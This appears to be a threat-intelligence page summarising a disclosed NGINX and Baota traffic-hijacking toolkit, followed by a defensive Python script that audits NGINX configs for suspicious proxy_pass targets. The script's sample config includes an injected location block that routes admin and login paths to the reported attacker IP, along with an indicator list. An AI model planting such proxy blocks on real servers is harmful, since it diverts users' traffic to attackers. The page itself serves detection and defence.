NGINX hijack toolkit that injects configs and exfiltrates mapping data
Malware Activity
Summary
A scripted multi-stage toolkit is automating NGINX configuration injection, service reloads, and C2 exfiltration to hijack traffic on compromised hosts. The toolkit’s stages use scripts such as zx.sh, bt.sh, 4zdh.sh, zdh.sh, and ok.sh to modify configuration files, preserve legitimate-looking headers, and map hijacked domains. It targets NGINX installations and Baota hosting panels, with emphasis on sites using .in and .id domains as well as .edu and .gov sites. The activity matters because it hides malicious routing inside normal NGINX behavior, making the traffic diversion difficult to spot without specific monitoring.
Related Happenings
NGINX Plus and NGINX Open Source ngx_http_rewrite_module heap buffer overflow remote code execution flaw (CVE-2026-42945)
Vulnerability
First: 14.05.2026 09:00
Last: 14.05.2026 09:00
Sources 1
About this happening:
**CVE-2026-42945** exposes a **heap buffer overflow** in **NGINX Plus** and **NGINX Open Source** through **ngx_http_rewrite_module**, creating risk of **unauthenticated remote co...
Active web traffic hijacking campaign targeting NGINX and Baota panels
Campaign
First: 05.02.2026 06:56
Last: 05.02.2026 06:56
Sources 1
About this happening:
An active **web traffic hijacking campaign** is targeting **NGINX** installations and **Baota (BT)** management panels, putting legitimate site traffic at risk of redirection thro...
NGINX traffic hijacking campaign targeting Asian and government domains
Campaign
First: 05.02.2026 01:26
Last: 05.02.2026 01:26
Sources 1
How related:
A threat actor is compromising NGINX servers in a campaign that hijacks user traffic and reroutes it through the attacker's backend infrastructure.
About this happening:
A **threat actor** is running an active **traffic-hijacking campaign** against **NGINX servers**, rerouting user requests through attacker infrastructure and increasing the risk o...
Timeline
- 05.02.2026 01:26 · 2 articles · 3mo ago
DataDog Security Labs discloses NGINX traffic-hijack toolkit
Initial Disclosure: On 2026-02-04, DataDog Security Labs disclosed a campaign compromising NGINX servers and Baota hosting management panels to hijack user traffic by injecting malicious NGINX location blocks and proxying requests through attacker-controlled backend infrastructure. The staged toolkit uses zx.sh, bt.sh, 4zdh.sh, zdh.sh, and ok.sh to modify configuration files, validate and reload NGINX, preserve normal request headers, and exfiltrate hijack mappings to 158.94.210[.]227, with targeting focused on .in, .id, .pe, .bd, .th, .edu, and .gov sites.
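The disclosure above describes the hijack as injected NGINX location blocks whose proxy_pass points at attacker-controlled infrastructure. A defender can look for exactly that: location blocks that proxy to a host which is neither a declared upstream nor a loopback/private address, or which matches a known indicator. The script below is an added example written for this page, not code from DataDog Security Labs or the toolkit; the sample configuration is constructed, and the only indicator it carries is the backend IP named in the disclosure (158.94.210[.]227, written undefanged so it can be matched).

```python
"""Audit an NGINX configuration for location blocks that proxy to unexpected hosts.

Added example (not from the original page). Scans every `location { ... }` block,
extracts `proxy_pass` targets, and flags any that are not a declared upstream,
not loopback/private, or that match a known indicator from the disclosure.
"""
import ipaddress
import re
from typing import Dict, List, Set, Tuple
from urllib.parse import urlsplit

# Constructed sample config: one legitimate site plus an injected location block
# that proxies selected paths to the backend IP reported in the disclosure.
SAMPLE_CONFIG = """
upstream app_backend { server 127.0.0.1:8080; }
server {
    listen 80;
    server_name example.edu;
    location / {
        proxy_pass http://app_backend;
        proxy_set_header Host $host;
    }
    location ~* ^/(admin|login) {
        proxy_pass http://158.94.210.227:8080;
        proxy_set_header Host $host;
    }
}
"""

# Indicator from the disclosure (defanged on the page as 158.94.210[.]227).
KNOWN_BAD_HOSTS: Set[str] = {"158.94.210.227"}

LOCATION_RE = re.compile(r"\blocation\s+([^{]+)\{")
PROXY_PASS_RE = re.compile(r"\bproxy_pass\s+([^;\s]+)\s*;")
UPSTREAM_RE = re.compile(r"\bupstream\s+(\S+)\s*\{")


def find_location_blocks(cfg: str) -> List[Tuple[str, str]]:
    """Return (matcher, body) for every location block, honouring nested braces."""
    blocks = []
    for m in LOCATION_RE.finditer(cfg):
        depth, i = 1, m.end()
        while i < len(cfg) and depth:
            if cfg[i] == "{":
                depth += 1
            elif cfg[i] == "}":
                depth -= 1
            i += 1
        blocks.append((m.group(1).strip(), cfg[m.end():i - 1]))
    return blocks


def classify_target(target: str, upstreams: Set[str]) -> List[str]:
    """Return the reasons a proxy_pass target is suspicious (empty list = fine)."""
    host = urlsplit(target).hostname or ""
    if host in upstreams or host == "localhost":
        return []
    reasons = []
    if host in KNOWN_BAD_HOSTS:
        reasons.append("known_ioc")
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        # A bare hostname (or an nginx variable such as $backend) that was never
        # declared as an upstream: worth a human look, not automatically bad.
        reasons.append("non_upstream_hostname")
        return reasons
    if ip.is_global:
        reasons.append("external_ip")  # traffic leaves the host for a public address
    return reasons


def audit_config(cfg: str) -> List[Dict[str, object]]:
    """Collect every location block whose proxy_pass target is suspicious."""
    upstreams = set(UPSTREAM_RE.findall(cfg))
    findings = []
    for matcher, body in find_location_blocks(cfg):
        for target in PROXY_PASS_RE.findall(body):
            reasons = classify_target(target, upstreams)
            if reasons:
                findings.append({"location": matcher, "target": target, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit_config(SAMPLE_CONFIG):
        print(f"location {f['location']!r} -> {f['target']}  [{', '.join(f['reasons'])}]")
```

Run it against `nginx -T` output (which expands every `include`) rather than a single file, since the disclosure notes the toolkit edits configuration files and then validates and reloads NGINX; a config that passes `nginx -t` is still worth auditing for where its proxy targets actually go.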
Sources
- Hackers compromise NGINX servers to redirect user traffic — www.bleepingcomputer.com — 05.02.2026 01:26